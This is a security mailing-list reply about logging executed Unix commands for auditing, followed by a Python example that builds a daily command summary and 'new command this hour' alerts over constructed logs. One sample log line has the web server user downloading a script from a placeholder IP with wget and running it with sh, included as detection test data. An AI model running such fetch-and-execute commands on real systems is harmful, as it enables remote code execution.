Joe Magee wrote:
> We've certainly seen it. Can be a bit noisy in a production *nix environment. 
> A lot of times we isolate this to say "PCI" systems or other compliance 
> targets... 
> 
> With that said, it's also interesting seeing those backup jobs running as 
> root, or better yet seeing the backup jobs failing as root (i.e. not running). 
> Then running a report that shows that happening every night for the past 
> month (doh!)
> 
> I miss Squire... :)
> 
> - Joe
> 
> P.S. Who's not a lurker!  (that'd be me..)

I've also heard folks say that this causes a performance hit. I think
the hit is really on your log server and disk drive.

I'm a fan of doing this sort of logging because after the fact, if
you really need to know what an admin or a hacker did, you have a lot
more to go on than just login/logout logs. I wish both Windows and
Unix platforms did more to log the arguments of the commands run.

Having said that, our approach with our Log Correlation Engine product
is to:

- summarize all unique commands and user accounts run on a daily basis,
  which makes for a nice quick report.
- alert the first time when a new command is run during a given hour
  of the day.
- have all of the process/program accounting logs available with other
  logs in case you need to look that close at what happened.

A lot of folks tend to do this sort of auditing on their databases,
but I'd like to see more folks run this on their web app servers. It
won't help for someone who can steal/ex-filtrate data, but it can help
if someone is invoking a command through a web app flaw.

-- 
Ron Gula, CEO
Tenable Network Security


_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
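
The two detections Ron describes (a daily summary of unique commands per user, and an alert the first time a command shows up during a given hour of the day) run over constructed sample lines below. This is an added example, not code from the post or from Tenable's Log Correlation Engine; the log layout, the sample lines, the user names and the 203.0.113.10 address are all made up for the example, and real process accounting (psacct/lastcomm output or auditd EXECVE records) needs its own parser.

```python
"""Daily command summary and "new command for this hour" alerting over
process-accounting style logs.

Added example, not code from the post or from Tenable's Log Correlation
Engine. The log format and the sample lines below are constructed for the
example; real process accounting (lastcomm/psacct, auditd EXECVE) looks
different and needs its own parser.
"""
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample feed: "<ISO timestamp> <user> <program> [args...]".
# Day one is ordinary activity (nightly backup as root, an admin edit,
# the web server shelling out); day two adds a download by the web
# server user, the kind of thing a command-injection flaw would produce.
SAMPLE_LOGS = """\
2012-03-01T02:00:11 root /usr/bin/rsync -a /var/www /backup/www
2012-03-01T02:00:12 root /usr/bin/rsync -a /var/lib/mysql /backup/db
2012-03-01T09:15:02 alice /usr/bin/vim /etc/httpd/conf/httpd.conf
2012-03-01T14:22:40 apache /bin/sh -c "ls /var/www/html"
2012-03-02T02:00:09 root /usr/bin/rsync -a /var/www /backup/www
2012-03-02T02:00:10 root /usr/bin/rsync -a /var/lib/mysql /backup/db
2012-03-02T14:30:01 apache /bin/sh -c "uname -a"
2012-03-02T14:31:15 apache /usr/bin/wget http://203.0.113.10/x.sh
2012-03-02T14:31:18 apache /bin/sh ./x.sh
"""


def parse_line(line):
    """Split one constructed log line into a record dict."""
    ts, user, rest = line.split(" ", 2)
    cmd, _, args = rest.partition(" ")
    return {"ts": datetime.fromisoformat(ts), "user": user,
            "cmd": cmd, "args": args}


def parse_logs(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def daily_summary(records):
    """Unique (user, program) pairs per day with run counts: the quick
    daily report. Keys are ISO dates; values map (user, cmd) to count."""
    per_day = defaultdict(Counter)
    for r in records:
        per_day[r["ts"].date().isoformat()][(r["user"], r["cmd"])] += 1
    return {day: dict(c) for day, c in per_day.items()}


def first_seen_alerts(records, learn_through=None):
    """Alert the first time a program runs during a given hour of the day.

    Records dated on or before learn_through (an ISO date string) only
    populate the (hour, program) baseline; later records that introduce a
    pair not yet seen produce an alert. Cron-style jobs therefore stay
    quiet once learned, while a program that is new to that hour does not.
    """
    seen = set()
    alerts = []
    for r in sorted(records, key=lambda rec: rec["ts"]):
        key = (r["ts"].hour, r["cmd"])
        if key in seen:
            continue
        seen.add(key)
        if learn_through and r["ts"].date().isoformat() <= learn_through:
            continue  # baseline period: learn the pair, do not alert
        alerts.append({"ts": r["ts"].isoformat(), "hour": r["ts"].hour,
                       "user": r["user"], "cmd": r["cmd"], "args": r["args"]})
    return alerts


def run_example(learn_through="2012-03-01"):
    """Treat the first day as baseline and report on the second."""
    records = parse_logs(SAMPLE_LOGS)
    return daily_summary(records), first_seen_alerts(records, learn_through)


if __name__ == "__main__":
    summary, alerts = run_example()
    for day in sorted(summary):
        print(day)
        for (user, cmd), n in sorted(summary[day].items()):
            print("  %-8s %-20s x%d" % (user, cmd, n))
    for a in alerts:
        print("ALERT %s hour %02d: new program %s run by %s %s"
              % (a["ts"], a["hour"], a["cmd"], a["user"], a["args"]))
```

Keying the alert on the program path rather than the full argument string is what keeps this usable on a busy production box: the nightly rsync as root is learned once and stays quiet, while the web server user fetching a file at 14:31 on the second day is the single alert. The arguments are still carried in the record for the after-the-fact investigation the post argues for.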
